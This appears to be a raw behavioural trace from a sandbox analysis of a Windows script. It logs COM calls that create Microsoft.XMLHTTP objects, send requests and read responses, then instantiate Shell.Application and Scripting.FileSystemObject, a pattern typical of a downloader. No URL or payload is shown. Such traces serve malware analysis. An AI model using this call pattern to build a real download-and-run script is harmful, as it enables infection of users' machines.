	[0801.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.841] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0801.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0801.841] longjmp () 
	[0801.841] longjmp () 
	[0801.841] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0801.841] SysStringLen (param_1=0x0) returned 0x0
	[0801.841] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0801.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0801.841] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0801.841] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0801.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0801.841] ??2@YAPEAX_K@Z () returned 0x62f310
	[0801.841] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0801.842] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0801.842] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0801.842] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0801.842] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0801.842] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.842] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0801.842] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0801.842] longjmp () 
	[0801.842] longjmp () 
	[0801.842] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0801.842] SysStringLen (param_1=0x0) returned 0x0
	[0801.842] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0801.843] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0801.843] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0801.843] ??2@YAPEAX_K@Z () returned 0x62f330
	[0801.843] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0801.843] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0801.843] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.843] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0801.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0801.844] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0801.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0804.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0804.365] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0804.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0804.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0804.366] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0804.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0804.366] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0804.366] SysStringLen (param_1=0x0) returned 0x0
	[0804.366] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0804.366] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0804.366] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0804.366] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0804.366] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0804.367] ??2@YAPEAX_K@Z () returned 0x62f350
	[0804.367] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0804.367] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0804.367] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0804.367] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0804.367] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0804.367] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0804.367] SysStringLen (param_1=0x0) returned 0x0
	[0804.367] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0804.372] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0804.372] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0804.372] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0804.372] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0804.372] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0804.373] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0808.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0808.875] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0808.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0808.876] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0808.876] SysStringLen (param_1=0x0) returned 0x0
	[0808.876] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0808.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0808.877] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0808.877] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0808.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0808.877] ??2@YAPEAX_K@Z () returned 0x62f330
	[0808.877] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0808.877] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0808.880] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0808.880] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0808.880] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0808.880] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0808.881] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0808.883] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0808.883] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0808.883] SysStringLen (param_1=0x0) returned 0x0
	[0808.883] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0808.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0808.884] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0808.884] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0808.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0808.884] ??2@YAPEAX_K@Z () returned 0x62f310
	[0808.884] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0808.884] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0808.884] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0808.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0808.884] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
